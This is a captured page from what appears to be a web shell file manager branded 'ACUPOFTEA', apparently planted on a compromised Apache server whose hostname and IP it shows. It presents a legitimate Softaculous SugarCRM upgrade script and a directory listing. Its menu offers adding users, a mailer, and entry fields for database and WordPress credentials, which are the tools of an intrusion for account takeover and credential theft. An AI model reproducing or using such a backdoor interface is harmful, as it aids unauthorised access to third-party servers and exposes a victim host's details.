System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
var
/
softaculous
/
sugar
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
_upgrade.php
<?php ////////////////////////////////////////////////////////////// //=========================================================== // upgrade.php(For individual softwares) //=========================================================== // SOFTACULOUS // Version : 1.0 // Inspired by the DESIRE to be the BEST OF ALL // ---------------------------------------------------------- // Started by: Alons // Date: 10th Jan 2009 // Time: 21:00 hrs // Site: http://www.softaculous.com/ (SOFTACULOUS) // ---------------------------------------------------------- // Please Read the Terms of use at http://www.softaculous.com // ---------------------------------------------------------- //=========================================================== // (c)Softaculous Inc. //=========================================================== ////////////////////////////////////////////////////////////// if(!defined('SOFTACULOUS')){ die('Hacking Attempt'); } ///////////////////////////////////////// // All functions in this PAGE must begin // with TWO UNDERSCORE '__' to avoid // clashes with SOFTACULOUS Functions // e.g. __funcname() ///////////////////////////////////////// ////////////////////////////////////////// // Note : The path of the upgrade package // is $software['path'].'/' . So to // access other files use // $software['path'].'/other_file.ext' ////////////////////////////////////////// // NOTE: $__settings will contain the installation information like PATH, URL. They are : // $__settings['ver'] - The version of the current installation // $__settings['itime'] - When the software was installed // $__settings['softpath'] - The current PATH // $__settings['softurl'] - The URL of the software // IF database was made by Softaclous // $__settings['softdb'] - The Database name // $__settings['softdbuser'] - Database User // $__settings['softdbhost'] - Database Host // $__settings['softdbpass'] - Database Password //The Upgrade process function __upgrade($version_from){ global $__settings, $error, $software; $query = "SELECT user_name FROM users WHERE `title` = 'Administrator';"; $result = sdb_query($query, $__settings['softdbhost'], $__settings['softdbuser'], $__settings['softdbpass'], $__settings['softdb']); $username = $result[0]['user_name']; if(empty($username)){ $error[] = "Could not get the admin username."; } // this zip can be only used for upgrade from 6.5.0 to 6.5.17 // please do not forget to change zip filename scopy($software['path'].'/SugarCE-Upgrade-6.5.x-to-6.5.17.zip', $__settings['softpath'].'/upload/SugarCE-Upgrade-6.5.x-to-6.5.17.zip'); swrite($__settings['softpath'].'/soft.log', '', 1); // please do not forget to change zip filename sshell_exec('"'.phpbin().'" -f '.$__settings['softpath'].'/modules/UpgradeWizard/silentUpgrade.php '.$__settings['softpath'].'/upload/SugarCE-Upgrade-6.5.x-to-6.5.17.zip '.$__settings['softpath'].'/soft.log '.$__settings['softpath'].' '.$username); $query = "SELECT value FROM config WHERE `name` = 'sugar_version';"; $result = sdb_query($query, $__settings['softdbhost'], $__settings['softdbuser'], $__settings['softdbpass'], $__settings['softdb']); $newversion = $result[0]['value']; if($newversion != $software['ver']){ $error[] = "Could not upgrade the database"; } } //Check whether the Minimum Software configuration matches function __requirements(){ global $__settings, $error, $software, $globals; //If there are some shorfalls then pass it to $error and return false if($globals['softpanel'] == 'ampps'){ $error[] = "Upgrade is not possible through AMPPS"; } if(!function_exists('shell_exec')){ $error[] = "Upgrade requires shell_exec to be enabled on your server"; } if(sversion_compare($__settings['ver'], '6.5.0', '<')){ $error[] = "Upgrade is possible from version 6.5.0"; } return true; } ?>
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2024-06-25 09:42:17
..
DIR
-
drwxr-xr-x
2025-10-25 09:38:52
images
DIR
-
drwxr-xr-x
2024-06-25 09:42:17
php53
DIR
-
drwxr-xr-x
2024-06-25 09:42:17
php56
DIR
-
drwxr-xr-x
2024-06-25 09:42:17
php71
DIR
-
drwxr-xr-x
2024-06-25 09:42:17
php81
DIR
-
drwxr-xr-x
2024-06-25 09:42:17
php82
DIR
-
drwxr-xr-x
2024-06-25 09:42:17
.htaccess
text/plain
1.39 KB
-rw-r--r--
2021-12-23 06:54:36
_upgrade.php
text/x-php
3.82 KB
-rw-r--r--
2021-12-23 06:54:36
_upgrade.xml
text/plain
311 B
-rw-r--r--
2021-12-23 06:54:36
clone.php
text/x-php
7.76 KB
-rw-r--r--
2024-05-02 08:39:02
config.php
text/x-php
8.21 KB
-rw-r--r--
2021-12-23 06:54:36
config_override.php
text/x-php
96 B
-rw-r--r--
2021-12-23 06:54:36
edit.php
text/x-php
4.16 KB
-rw-r--r--
2024-05-02 08:39:02
edit.xml
text/html
433 B
-rw-r--r--
2021-12-23 06:54:36
fileindex.php
text/plain
683 B
-rw-r--r--
2021-12-23 06:54:36
import.php
text/x-php
2.84 KB
-rw-r--r--
2024-05-02 08:39:02
info.xml
text/html
1.83 KB
-rw-r--r--
2024-05-02 06:25:50
install.js
text/plain
924 B
-rw-r--r--
2021-12-23 06:54:36
install.php
text/x-php
7.99 KB
-rw-r--r--
2024-05-02 08:39:02
install.xml
text/html
952 B
-rw-r--r--
2021-12-23 06:54:36
md5
text/plain
9.1 KB
-rw-r--r--
2024-05-02 08:39:02
notes.txt
text/plain
597 B
-rw-r--r--
2021-12-23 06:54:36
~ ACUPOFTEA - mail.ontime-ae.com